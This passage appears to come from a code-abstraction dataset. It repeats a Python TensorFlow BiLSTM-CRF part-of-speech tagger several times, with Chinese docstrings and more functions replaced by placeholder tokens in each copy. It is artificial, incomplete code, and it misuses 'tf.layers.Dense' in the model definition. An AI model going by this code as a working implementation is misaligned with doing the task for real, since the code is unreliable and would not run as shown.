字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n<function token>\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n<function token>\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 